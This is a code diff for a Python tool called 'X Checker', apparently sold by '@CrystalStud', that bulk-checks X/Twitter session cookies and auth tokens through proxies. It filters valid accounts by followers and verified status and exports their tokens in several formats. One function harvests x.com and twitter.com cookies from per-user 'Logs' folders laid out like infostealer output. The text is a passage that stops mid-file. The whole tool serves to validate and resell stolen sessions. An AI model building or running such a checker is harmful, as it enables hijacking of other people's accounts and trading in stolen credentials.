print_success(f"Found {len(token_files)} token file(s)") + + all_tokens = [] + for token_file in token_files: + tokens = read_auth_tokens_from_file(token_file) + for line_num, token in tokens: + all_tokens.append((token_file, line_num, token)) + + if not all_tokens: + print_error("No valid auth tokens found in files") + return + + print_success(f"Found {len(all_tokens)} auth token(s)") + + proxies = [] + if proxy_file: + print_info(f"Loading proxies from: {proxy_file}") + try: + proxies = read_proxy_file(proxy_file) + if not proxies: + print_error("No valid proxies found, continuing without proxy") + except: + print_error("Failed to load proxies, continuing without proxy") + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m CHECKING ACCOUNTS (AUTH TOKEN MODE)\033[0m") + print(f"\033[1;35m Threads: {config['threads']}\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print() + + num_threads = config['threads'] + concurrent_per_thread = 5 + batch_size = len(all_tokens) // num_threads + batches = [] + + for i in range(num_threads): + start_idx = i * batch_size + if i == num_threads - 1: + end_idx = len(all_tokens) + else: + end_idx = (i + 1) * batch_size + batches.append(all_tokens[start_idx:end_idx]) + + semaphore = asyncio.Semaphore(concurrent_per_thread) + results = [] + user_data_list = [] + + check_start_time = datetime.now() + total_checked = 0 + + async def monitor_progress(): + nonlocal total_checked + while total_checked < len(all_tokens): + await asyncio.sleep(0.3) + checked = len(results) + if checked != total_checked: + total_checked = checked + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + remaining = len(all_tokens) - total_checked + + if total_checked > 0 and remaining > 0: + elapsed = (datetime.now() - check_start_time).total_seconds() + avg_time = elapsed / total_checked + eta_seconds = avg_time * remaining + eta_str = f"{int(eta_seconds // 60)}m {int(eta_seconds % 60)}s" + else: + eta_str = "calculating..." + + progress_bar = "█" * (total_checked * 40 // len(all_tokens)) + "░" * (40 - total_checked * 40 // len(all_tokens)) + print(f"\r\033[1;36m[{progress_bar}]\033[0m {total_checked}/{len(all_tokens)} | \033[1;32m✓{successful}\033[0m | \033[1;31m✗{failed}\033[0m | \033[1;33m★{verified_count}\033[0m | ETA: {eta_str} ", end='', flush=True) + + monitor_task = asyncio.create_task(monitor_progress()) + + batch_tasks = [] + for batch in batches: + task = process_batch_tokens(batch, proxies, output_dir, semaphore, config['cookies_only_mode'], results, user_data_list) + batch_tasks.append(task) + + await asyncio.gather(*batch_tasks) + await monitor_task + + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + + print() + print() + + end_time = datetime.now() + elapsed_time = end_time - start_time + elapsed_seconds = elapsed_time.total_seconds() + + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m SUMMARY\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal accounts:\033[0m {len(all_tokens)}") + print(f"\033[1;32m✓ Successful:\033[0m {successful}") + print(f"\033[1;31m✗ Failed:\033[0m {failed}") + print(f"\033[1;33m★ Verified:\033[0m {verified_count}") + print(f"\033[1;35m⏱ Time elapsed:\033[0m {elapsed_seconds:.2f}s") + print(f"\033[1;34m📁 Results saved to:\033[0m {output_dir.absolute()}/") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + summary_file = output_dir / f"summary_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt" + summary_lines = [ + "=" * 80, + "X Checker, contact @CrystalStud for support", + "=" * 80, + f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + "Results:", + f" Total accounts checked: {len(all_tokens)}", + f" Valid accounts: {successful}", + f" Invalid accounts: {failed}", + f" Verified accounts: {verified_count}", + "", + "Performance:", + f" Time elapsed: {elapsed_seconds:.2f}s", + f" Average per account: {elapsed_seconds/len(all_tokens):.2f}s", + "", + "Configuration:", + f" Proxies loaded: {len(proxies) if proxies else 0}", + f" Token files: {len(token_files)}", + f" Total tokens: {len(all_tokens)}", + "", + "=" * 80, + ] + summary_file.write_text('\n'.join(summary_lines), encoding='utf-8') + print_success(f"Summary saved to: {summary_file.name}") + + try: + session_file = Path("temp_session.tw_session") + if session_file.exists(): + session_file.unlink() + except: + pass + + except FileNotFoundError as e: + print_error(f"Error: {e}") + except Exception as e: + print_error(f"Unexpected error: {e}") + + +async def filter_accounts(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ FILTER ACCOUNTS │") + print("└─────────────────────────────────────┘\033[0m\n") + + print_info("Enter filter criteria (leave empty to skip):") + print() + + min_followers = get_input("Minimum followers", str(config.get('filter_min_followers', 0))) + max_followers = get_input("Maximum followers (0 = unlimited)", str(config.get('filter_max_followers', 0))) + min_posts = get_input("Minimum posts", str(config.get('filter_min_posts', 0))) + min_likes = get_input("Minimum likes", str(config.get('filter_min_likes', 0))) + verified_only = get_input("Verified only? (y/n)", "n").lower() == "y" + + try: + min_followers = int(min_followers) + max_followers = int(max_followers) + min_posts = int(min_posts) + min_likes = int(min_likes) + except: + print_error("Invalid numeric input") + return + + config['filter_min_followers'] = min_followers + config['filter_max_followers'] = max_followers + config['filter_min_posts'] = min_posts + config['filter_min_likes'] = min_likes + config['filter_verified_only'] = verified_only + save_config(config) + + results_dir = Path(config['output_dir']) + if not results_dir.exists(): + print_error(f"Results directory not found: {results_dir}") + return + + result_files = list(results_dir.glob("*.txt")) + result_files = [f for f in result_files if not f.name.startswith("summary_")] + + if not result_files: + print_error("No account files found in results directory") + return + + print() + print_info(f"Found {len(result_files)} account files") + print() + + filtered_dir = Path(config.get('filtered_output_dir', 'filtered')) + filtered_dir.mkdir(exist_ok=True) + + from format_converter import parse_cookie_string, cookies_dict_to_netscape, cookies_dict_to_json, extract_auth_token_from_cookies + + filtered_count = 0 + save_format = config.get('save_format', 'auth_token') + + for result_file in result_files: + try: + content = result_file.read_text(encoding='utf-8') + lines = content.split('\n') + + followers = 0 + posts = 0 + likes = 0 + verified = False + username = "" + + for line in lines: + if line.startswith("Followers:"): + parts = line.split('|') + followers_part = parts[0].replace("Followers:", "").strip().replace(",", "") + try: + followers = int(followers_part) + except: + pass + elif line.startswith("Tweets:"): + parts = line.split('|') + posts_part = parts[0].replace("Tweets:", "").strip().replace(",", "") + likes_part = parts[1].replace("Likes:", "").strip().replace(",", "") + try: + posts = int(posts_part) + likes = int(likes_part) + except: + pass + elif line.startswith("Verified:"): + verified = "Yes" in line + elif line.startswith("Username:"): + username = line.split("@")[-1].strip() + + if followers >= min_followers and posts >= min_posts and likes >= min_likes: + if max_followers == 0 or followers <= max_followers: + if not verified_only or verified: + separator_index = -1 + for i, line in enumerate(lines): + if line.startswith("=" * 80): + separator_index = i + + if separator_index >= 0 and separator_index + 1 < len(lines): + content_data = '\n'.join(lines[separator_index + 1:]).strip() + + if save_format == 'auth_token': + if content_data.startswith('#') or '\t' in content_data: + cookies_dict = {} + for line in content_data.split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies_dict[parts[5]] = parts[6] + auth_token = cookies_dict.get('auth_token', content_data) + elif content_data.startswith('[') or content_data.startswith('{'): + import json + try: + data = json.loads(content_data) + if isinstance(data, list): + cookies_dict = {} + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies_dict[cookie['name']] = cookie['value'] + auth_token = cookies_dict.get('auth_token', content_data) + else: + auth_token = content_data + except: + auth_token = content_data + else: + auth_token = content_data + + output_file = filtered_dir / result_file.name + output_file.write_text(auth_token, encoding='utf-8') + elif save_format == 'netscape': + if content_data.startswith('[') or content_data.startswith('{'): + import json + try: + data = json.loads(content_data) + if isinstance(data, list): + cookies_dict = {} + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies_dict[cookie['name']] = cookie['value'] + else: + cookies_dict = data + netscape_content = cookies_dict_to_netscape(cookies_dict) + output_file = filtered_dir / result_file.name + output_file.write_text(netscape_content, encoding='utf-8') + except: + output_file = filtered_dir / result_file.name + output_file.write_text(content_data, encoding='utf-8') + else: + output_file = filtered_dir / result_file.name + output_file.write_text(content_data, encoding='utf-8') + elif save_format == 'json': + if content_data.startswith('#') or '\t' in content_data: + cookies_dict = {} + for line in content_data.split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies_dict[parts[5]] = parts[6] + json_content = cookies_dict_to_json(cookies_dict) + output_file = filtered_dir / result_file.name + output_file.write_text(json_content, encoding='utf-8') + else: + output_file = filtered_dir / result_file.name + output_file.write_text(content_data, encoding='utf-8') + + filtered_count += 1 + except Exception as e: + continue + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m FILTER RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal accounts scanned:\033[0m {len(result_files)}") + print(f"\033[1;32m✓ Accounts matching criteria:\033[0m {filtered_count}") + print(f"\033[1;34m📁 Filtered results saved to:\033[0m {filtered_dir.absolute()}/") + print(f"\033[1;35m💾 Save format:\033[0m {save_format}") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + +async def extract_tokens(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ EXTRACT AUTH TOKENS │") + print("└─────────────────────────────────────┘\033[0m\n") + + results_dir = Path(config['output_dir']) + if not results_dir.exists(): + print_error(f"Results directory not found: {results_dir}") + return + + result_files = list(results_dir.glob("*.txt")) + result_files = [f for f in result_files if not f.name.startswith("summary_")] + + if not result_files: + print_error("No account files found in results directory") + return + + print_info(f"Found {len(result_files)} account files") + print() + + output_file = get_input("Enter output filename", "auth_tokens.txt") + output_path = Path(output_file) + + from format_converter import parse_cookie_string, extract_auth_token_from_cookies + import json + + tokens = [] + extracted_count = 0 + + for result_file in result_files: + try: + content = result_file.read_text(encoding='utf-8') + lines = content.split('\n') + + separator_index = -1 + for i, line in enumerate(lines): + if line.startswith("=" * 80): + separator_index = i + + if separator_index >= 0 and separator_index + 1 < len(lines): + content_data = '\n'.join(lines[separator_index + 1:]).strip() + + auth_token = None + + if content_data.startswith('#') or '\t' in content_data: + cookies_dict = {} + for line in content_data.split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies_dict[parts[5]] = parts[6] + auth_token = cookies_dict.get('auth_token') + elif content_data.startswith('[') or content_data.startswith('{'): + try: + data = json.loads(content_data) + if isinstance(data, list): + cookies_dict = {} + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies_dict[cookie['name']] = cookie['value'] + auth_token = cookies_dict.get('auth_token') + else: + auth_token = data.get('auth_token') + except: + pass + else: + if 'auth_token=' in content_data or len(content_data) > 30: + if '; ' in content_data: + cookies_dict = parse_cookie_string(content_data) + auth_token = cookies_dict.get('auth_token') + else: + auth_token = content_data.strip() + + if auth_token: + tokens.append(auth_token) + extracted_count += 1 + except Exception as e: + continue + + if tokens: + output_path.write_text('\n'.join(tokens), encoding='utf-8') + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m EXTRACTION RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal files scanned:\033[0m {len(result_files)}") + print(f"\033[1;32m✓ Tokens extracted:\033[0m {extracted_count}") + print(f"\033[1;34m📁 Saved to:\033[0m {output_path.absolute()}") + print("\033[1;36m" + "=" * 70 + "\033[0m") + else: + print_error("No auth tokens found in result files") + + +async def convert_cookies(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ CONVERT COOKIE FORMAT │") + print("└─────────────────────────────────────┘\033[0m\n") + + print("\033[1;33mSelect conversion:\033[0m") + print(" 1. Netscape → JSON") + print(" 2. JSON → Netscape") + print() + + conversion_choice = get_input("Enter choice (1/2)") + + if conversion_choice not in ["1", "2"]: + print_error("Invalid choice") + return + + input_path = get_input("Enter input file/directory path") + input_location = Path(input_path).expanduser().resolve() + + if not input_location.exists(): + input_location = Path.cwd() / input_path + if not input_location.exists(): + print_error(f"Path not found: {input_path}") + return + + output_dir = get_input("Enter output directory", "converted") + output_path = Path(output_dir) + output_path.mkdir(exist_ok=True) + + from cookie_parser import netscape_to_dict, json_to_dict, clean_cookie_content + from format_converter import cookies_dict_to_netscape, cookies_dict_to_json + import json + + files_to_convert = [] + if input_location.is_file(): + files_to_convert = [input_location] + else: + files_to_convert = list(input_location.glob('*.txt')) + list(input_location.glob('*.json')) + + if not files_to_convert: + print_error("No files found to convert") + return + + print() + print_info(f"Found {len(files_to_convert)} file(s) to convert") + print() + + converted_count = 0 + + for file_path in files_to_convert: + try: + content = file_path.read_text(encoding='utf-8') + cleaned_content = clean_cookie_content(content) + + cookies_dict = None + + if conversion_choice == "1": + try: + cookies_dict = netscape_to_dict(cleaned_content) + if cookies_dict: + json_content = cookies_dict_to_json(cookies_dict) + output_file = output_path / f"{file_path.stem}.json" + output_file.write_text(json_content, encoding='utf-8') + converted_count += 1 + except Exception as e: + continue + else: + try: + cookies_dict = json_to_dict(cleaned_content) + if cookies_dict: + netscape_content = cookies_dict_to_netscape(cookies_dict) + output_file = output_path / f"{file_path.stem}.txt" + output_file.write_text(netscape_content, encoding='utf-8') + converted_count += 1 + except Exception as e: + continue + except Exception as e: + continue + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m CONVERSION RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal files scanned:\033[0m {len(files_to_convert)}") + print(f"\033[1;32m✓ Files converted:\033[0m {converted_count}") + print(f"\033[1;34m📁 Saved to:\033[0m {output_path.absolute()}/") + if conversion_choice == "1": + print(f"\033[1;35m📝 Format:\033[0m Netscape → JSON") + else: + print(f"\033[1;35m📝 Format:\033[0m JSON → Netscape") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + +async def extract_xcom_cookies_from_logs(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ EXTRACT X.COM COOKIES FROM LOGS │") + print("└─────────────────────────────────────┘\033[0m\n") + + logs_path = get_input("Enter logs directory path", "Logs") + logs_dir = Path(logs_path).expanduser().resolve() + + if not logs_dir.exists(): + logs_dir = Path.cwd() / logs_path + if not logs_dir.exists(): + print_error(f"Logs directory not found: {logs_path}") + return + + if not logs_dir.is_dir(): + print_error(f"Path is not a directory: {logs_path}") + return + + output_dir = get_input("Enter output directory", "extracted_xcom_cookies") + output_path = Path(output_dir) + output_path.mkdir(exist_ok=True) + + print() + print_info(f"Scanning logs directory: {logs_dir}") + print() + + extracted_count = 0 + scanned_files = 0 + + for user_folder in logs_dir.iterdir(): + if not user_folder.is_dir(): + continue + + cookies_folder = user_folder / "Cookies" + if not cookies_folder.exists() or not cookies_folder.is_dir(): + continue + + for cookie_file in cookies_folder.iterdir(): + if not cookie_file.is_file(): + continue + + if cookie_file.suffix not in ['.txt', '.log', '']: + continue + + try: + scanned_files += 1 + content = cookie_file.read_text(encoding='utf-8', errors='ignore') + lines = content.split('\n') + + all_cookies = [] + + for line in lines: + line = line.strip() + if not line or line.startswith('#'): + continue + + parts = line.split('\t') + if len(parts) >= 7: + domain = parts[0] + if '.x.com' in domain or 'x.com' == domain or '.twitter.com' in domain or 'twitter.com' == domain: + parts[0] = parts[0].replace('.twitter.com', '.x.com') + if parts[0] == 'twitter.com': + parts[0] = 'x.com' + converted_line = '\t'.join(parts) + all_cookies.append(converted_line) + + if all_cookies: + username = user_folder.name + + safe_username = "".join(c if c.isalnum() or c in ('-', '_') else '_' for c in username) + + output_file = output_path / f"{safe_username}.txt" + + cookie_content = '\n'.join(all_cookies) + output_file.write_text(cookie_content, encoding='utf-8') + extracted_count += 1 + break + + except Exception as e: + continue + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m EXTRACTION RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mFiles scanned:\033[0m {scanned_files}") + print(f"\033[1;32m✓ Accounts with X.com cookies:\033[0m {extracted_count}") + print(f"\033[1;34m📁 Saved to:\033[0m {output_path.absolute()}/") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + +async def main(): + while True: + print_banner() + print_menu() + + choice = get_input("Select option") + + if choice == "1": + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ CHECK ACCOUNTS │") + print("└─────────────────────────────────────┘\033[0m\n") + + print(f"\033[1;33mCurrent Auth Mode:\033[0m \033[1;36m{config['auth_mode']}\033[0m\n") + + if config['auth_mode'] == 'cookies': + cookies_path = get_input("Enter cookies directory/file path", config['cookies_dir']) + use_proxy = get_input("Use proxies? (y/n)", "y" if config['use_proxy'] else "n").lower() + + proxy_file = None + if use_proxy == "y": + proxy_file = get_input("Enter proxy file path", "proxies.txt") + + print() + await run_checker(cookies_path, proxy_file) + else: + tokens_path = get_input("Enter auth tokens directory/file path", config.get('tokens_dir', 'tokens')) + use_proxy = get_input("Use proxies? (y/n)", "y" if config['use_proxy'] else "n").lower() + + proxy_file = None + if use_proxy == "y": + proxy_file = get_input("Enter proxy file path", "proxies.txt") + + print() + await run_checker_tokens(tokens_path, proxy_file) + + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "2": + await filter_accounts() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "3": + await extract_tokens() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "4": + await convert_cookies() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "5": + await extract_xcom_cookies_from_logs() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "6": + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ SETTINGS │") + print("└─────────────────────────────────────┘\033[0m\n") + print("\033[1;33mCurrent Settings:\033[0m") + print(f" 1. Cookies directory: \033[1;36m{config['cookies_dir']}\033[0m") + print(f" 2. Output directory: \033[1;36m{config['output_dir']}\033[0m") + print(f" 3. Cookies only mode: \033[1;36m{'Enabled' if config['cookies_only_mode'] else 'Disabled'}\033[0m") + print(f" 4. Threads: \033[1;36m{config['threads']}\033[0m") + print(f" 5. Use proxy by default: \033[1;36m{'Yes' if config['use_proxy'] else 'No'}\033[0m") + print(f" 6. Auth mode: \033[1;36m{config['auth_mode']}\033[0m") + print(f" 7. Save format: \033[1;36m{config.get('save_format', 'auth_token')}\033[0m") + print(f"\n 0. Back to main menu") + print() + + setting_choice = get_input("Select setting to change") + + if setting_choice == "1": + new_dir = get_input("Enter cookies directory", config['cookies_dir']) + config['cookies_dir'] = new_dir + save_config(config) + print_success(f"Cookies directory set to: {new_dir}") + await asyncio.sleep(1) + elif setting_choice == "2": + new_dir = get_input("Enter output directory", config['output_dir']) + config['output_dir'] = new_dir + save_config(config) + print_success(f"Output directory set to: {new_dir}") + await asyncio.sleep(1) + elif setting_choice == "3": + toggle = get_input("Enable cookies only mode? (y/n)", "n").lower() + config['cookies_only_mode'] = toggle == "y" + save_config(config) + print_success(f"Cookies only mode: {'Enabled' if config['cookies_only_mode'] else 'Disabled'}") + await asyncio.sleep(1) + elif setting_choice == "4": + new_threads = get_input("Enter number of threads (1-10)", str(config['threads'])) + try: + num = int(new_threads) + if 1 <= num <= 10: + config['threads'] = num + save_config(config) + print_success(f"Threads set to: {num}") + else: + print_error("Value must be between 1 and 10") + except: + print_error("Invalid number") + await asyncio.sleep(1) + elif setting_choice == "5": + toggle = get_input("Use proxy by default? (y/n)", "y" if config['use_proxy'] else "n").lower() + config['use_proxy'] = toggle == "y" + save_config(config) + print_success(f"Use proxy by default: {'Yes' if config['use_proxy'] else 'No'}") + await asyncio.sleep(1) + elif setting_choice == "6": + print("\n\033[1;33mSelect authentication mode:\033[0m") + print(" 1. Cookies (Netscape/JSON format)") + print(" 2. Auth Tokens (one per line in .txt)") + mode_choice = get_input("Enter choice (1/2)") + if mode_choice == "1": + config['auth_mode'] = 'cookies' + save_config(config) + print_success("Auth mode set to: cookies") + elif mode_choice == "2": + config['auth_mode'] = 'tokens' + save_config(config) + print_success("Auth mode set to: tokens") + else: + print_error("Invalid choice") + await asyncio.sleep(1) + elif setting_choice == "7": + print("\n\033[1;33mSelect save format:\033[0m") + print(" 1. Auth Token only") + print(" 2. Netscape format") + print(" 3. JSON format") + format_choice = get_input("Enter choice (1/2/3)") + if format_choice == "1": + config['save_format'] = 'auth_token' + save_config(config) + print_success("Save format set to: auth_token") + elif format_choice == "2": + config['save_format'] = 'netscape' + save_config(config) + print_success("Save format set to: netscape") + elif format_choice == "3": + config['save_format'] = 'json' + save_config(config) + print_success("Save format set to: json") + else: + print_error("Invalid choice") + await asyncio.sleep(1) + + elif choice == "7": + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ ABOUT │") + print("└─────────────────────────────────────┘\033[0m\n") + print("\033[1;36mX cookies Checker\033[0m") + print("\033[1;37mDeveloped by: @CrystalStud\033[0m") + print("\n\033[1;33mFeatures:\033[0m") + print(" • Bulk cookie/token validation") + print(" • Extract X.com cookies from logs") + print(" • Account filtering (followers, posts, verified)") + print(" • Auth token extraction") + print(" • Cookie format converter (Netscape ↔ JSON)") + print(" • Multiple save formats (auth_token, netscape, json)") + print(" • Proxy support (SOCKS5/HTTP)") + print(" • Multi-threaded processing") + print(" • Detailed reporting") + print("\n\033[1;35mContact: @CrystalStud for support/buy\033[0m") + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "0": + print_banner() + print("\n\033[1;35mThank you for using X Checker!\033[0m") + print("\033[1;36mDM @CrystalStud for support\033[0m\n") + sys.exit(0) + else: + print_error("Invalid option. Please try again.") + await asyncio.sleep(1) + + +if __name__ == "__main__": + asyncio.run(main()) diff --git a/proxy_handler.py b/proxy_handler.py new file mode 100644 index 0000000..e35c991 --- /dev/null +++ b/proxy_handler.py @@ -0,0 +1,66 @@ +from pathlib import Path +from typing import List +from tweety.types import Proxy, PROXY_TYPE_SOCKS5, PROXY_TYPE_HTTP + + +def read_proxy_file(file_path: str) -> List[Proxy]: + path = Path(file_path) + if not path.exists(): + raise FileNotFoundError(f"Proxy file not found: {file_path}") + + proxies = [] + lines = path.read_text(encoding='utf-8').strip().split('\n') + + for line in lines: + line = line.strip() + if not line or line.startswith('#'): + continue + + try: + if '://' in line: + protocol, rest = line.split('://', 1) + else: + protocol = 'socks5' + rest = line + + username = None + password = None + + if '@' in rest: + auth, host_port = rest.rsplit('@', 1) + if ':' in auth: + username, password = auth.split(':', 1) + else: + host_port = rest + + if ':' in host_port: + host, port = host_port.rsplit(':', 1) + port = int(port) + else: + continue + + protocol = protocol.lower() + if protocol in ['socks5', 'socks', 'socks5h']: + proxy_type = PROXY_TYPE_SOCKS5 + elif protocol in ['http', 'https']: + proxy_type = PROXY_TYPE_HTTP + else: + continue + + proxy = Proxy( + host=host, + port=port, + proxy_type=proxy_type, + username=username, + password=password + ) + + proxies.append(proxy) + + except Exception: + continue + + if proxies: + print(f"✓ Loaded {len(proxies)} proxies from file") + + return proxies diff --git a/test_single_cookie.py b/test_single_cookie.py new file mode 100644 index 0000000..8287fad --- /dev/null +++ b/test_single_cookie.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python3 +""" +Quick test script to debug a single cookie file +Usage: python3 test_single_cookie.py +""" + +import sys +from pathlib import Path +from cookie_parser import read_cookies_file, clean_cookie_content, netscape_to_dict, json_to_dict +import json +import debug_logger as log + +def test_cookie_file(file_path): + log.info(f"Testing cookie file: {file_path}") + log.info("=" * 80) + + path = Path(file_path) + if not path.exists(): + log.error(f"File not found: {file_path}") + return False + + # Read raw content + print("\n1. Reading file...") + try: + raw_content = path.read_text(encoding='utf-8') + log.info(f"✓ File read successfully, size: {len(raw_content)} bytes") + print(f"First 500 characters:") + print("-" * 80) + print(raw_content[:500]) + print("-" * 80) + except Exception as e: + log.error(f"✗ Failed to read file: {e}") + return False + + # Clean content + print("\n2. Cleaning content...") + try: + cleaned = clean_cookie_content(raw_content) + log.info(f"✓ Content cleaned, size: {len(cleaned)} bytes") + print(f"Cleaned content (first 500 chars):") + print("-" * 80) + print(cleaned[:500]) + print("-" * 80) + except Exception as e: + log.error(f"✗ Failed to clean content: {e}") + return False + + # Try to parse + print("\n3. Attempting to parse...") + cookies_dict = None + + # Try JSON first + try: + cookies_dict = json_to_dict(cleaned) + log.info(f"✓ Parsed as JSON format") + print(f"Cookies found: {len(cookies_dict)}") + print(f"Cookie names: {list(cookies_dict.keys())}") + except json.JSONDecodeError as e: + log.debug(f"Not JSON: {e}") + + # Try Netscape + try: + cookies_dict = netscape_to_dict(cleaned) + log.info(f"✓ Parsed as Netscape format") + print(f"Cookies found: {len(cookies_dict)}") + print(f"Cookie names: {list(cookies_dict.keys())}") + except Exception as e: + log.error(f"✗ Failed to parse as Netscape: {e}") + return False + + # Check for required cookies + print("\n4. Checking for required cookies...") + required_cookies = ['auth_token', 'ct0'] + for cookie_name in required_cookies: + if cookie_name in cookies_dict: + value = cookies_dict[cookie_name] + print(f"✓ {cookie_name}: {value[:30]}..." if len(value) > 30 else f"✓ {cookie_name}: {value}") + else: + print(f"✗ {cookie_name}: NOT FOUND") + + # Test full read_cookies_file function + print("\n5. Testing read_cookies_file function...") + try: + cookie_string = read_cookies_file(str(file_path)) + if cookie_string: + log.info(f"✓ read_cookies_file successful") + print(f"Cookie string length: {len(cookie_string)}") + print(f"Cookie string preview (first 200 chars):") + print(cookie_string[:200]) + else: + log.error(f"✗ read_cookies_file returned None") + return False + except Exception as e: + log.error(f"✗ read_cookies_file failed: {e}") + log.exception("Exception:") + return False + + log.info("=" * 80) + log.info("✓ All tests passed!") + return True + +if __name__ == "__main__": + if len(sys.argv) < 2: + # Test first file in cookies directory + cookies_dir = Path("cookies") + if cookies_dir.exists(): + cookie_files = list(cookies_dir.glob("*.txt")) + list(cookies_dir.glob("*.json")) + if cookie_files: + test_file = cookie_files[0] + print(f"No file specified, testing first file: {test_file}") + test_cookie_file(test_file) + else: + print("No cookie files found in cookies/ directory") + else: + print("Usage: python3 test_single_cookie.py ") + print("Or place cookie files in cookies/ directory") + else: + test_cookie_file(sys.argv[1]) diff --git a/twitter_auth_cookies.py b/twitter_auth_cookies.py new file mode 100644 index 0000000..a459c15 --- /dev/null +++ b/twitter_auth_cookies.py @@ -0,0 +1,608 @@ +#!/usr/bin/env python3 +""" +Twitter Authentication Script using Cookies +Supports Netscape and JSON cookie formats +""" + +import json +import sys +import asyncio +import random +import shutil +from pathlib import Path +from typing import Dict, Union, Optional, List +from datetime import datetime +from tweety import TwitterAsync +from tweety.types import Proxy, PROXY_TYPE_SOCKS5, PROXY_TYPE_HTTP + + +def clean_cookie_content(content: str) -> str: + """ + Clean cookie content by removing non-cookie data + + Args: + content: Raw file content + + Returns: + Cleaned content with only cookies + """ + lines = content.strip().split('\n') + cleaned_lines = [] + + # For JSON format - try to extract only the JSON array/object + content_stripped = content.strip() + if content_stripped.startswith('[') or content_stripped.startswith('{'): + # Find the matching bracket/brace + bracket_count = 0 + brace_count = 0 + json_end = 0 + + for i, char in enumerate(content_stripped): + if char == '[': + bracket_count += 1 + elif char == ']': + bracket_count -= 1 + if bracket_count == 0 and content_stripped[0] == '[': + json_end = i + 1 + break + elif char == '{': + brace_count += 1 + elif char == '}': + brace_count -= 1 + if brace_count == 0 and content_stripped[0] == '{': + json_end = i + 1 + break + + if json_end > 0: + return content_stripped[:json_end] + + # For Netscape format - keep only valid cookie lines + for line in lines: + line = line.strip() + + # Skip empty lines + if not line: + continue + + # Keep comments that are part of Netscape format + if line.startswith('#'): + cleaned_lines.append(line) + continue + + # Check if it's a valid Netscape cookie line (tab-separated) + parts = line.split('\t') + if len(parts) >= 7: + # Validate it looks like a cookie (domain, flag, path, secure, expiration, name, value) + try: + # Check if expiration is a number + int(parts[4]) + cleaned_lines.append(line) + except ValueError: + # Not a valid cookie line, skip it + continue + + return '\n'.join(cleaned_lines) if cleaned_lines else content + + +def netscape_to_dict(netscape_content: str) -> Dict[str, str]: + """ + Convert Netscape cookie format to dictionary + + Args: + netscape_content: Netscape format cookies as string + + Returns: + Dictionary of cookie name-value pairs + """ + cookies = {} + + for line in netscape_content.strip().split('\n'): + # Skip comments and empty lines + if line.startswith('#') or not line.strip(): + continue + + # Netscape format: domain flag path secure expiration name value + parts = line.split('\t') + if len(parts) >= 7: + cookie_name = parts[5] + cookie_value = parts[6] + cookies[cookie_name] = cookie_value + + return cookies + + +def json_to_dict(json_content: str) -> Dict[str, str]: + """ + Convert JSON cookie format to dictionary + + Args: + json_content: JSON format cookies as string + + Returns: + Dictionary of cookie name-value pairs + """ + cookies = {} + data = json.loads(json_content) + + # Handle different JSON formats + if isinstance(data, list): + # Format: [{"name": "cookie_name", "value": "cookie_value"}, ...] + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies[cookie['name']] = cookie['value'] + elif isinstance(data, dict): + # Format: {"cookie_name": "cookie_value", ...} + cookies = data + + return cookies + + +def dict_to_cookie_string(cookies: Dict[str, str]) -> str: + """ + Convert cookie dictionary to string format for tweety + + Args: + cookies: Dictionary of cookie name-value pairs + + Returns: + Cookie string in format "name1=value1; name2=value2" + """ + return "; ".join([f"{name}={value}" for name, value in cookies.items()]) + + +def read_proxy_file(file_path: str) -> List[Proxy]: + """ + Read all proxies from file + + Format: protocol://[username:password@]host:port + One proxy per line + + Args: + file_path: Path to proxy file + + Returns: + List of Proxy objects + """ + path = Path(file_path) + + if not path.exists(): + raise FileNotFoundError(f"Proxy file not found: {file_path}") + + proxies = [] + lines = path.read_text(encoding='utf-8').strip().split('\n') + + for line in lines: + line = line.strip() + if not line or line.startswith('#'): + continue + + try: + # Parse proxy URL + if '://' in line: + protocol, rest = line.split('://', 1) + else: 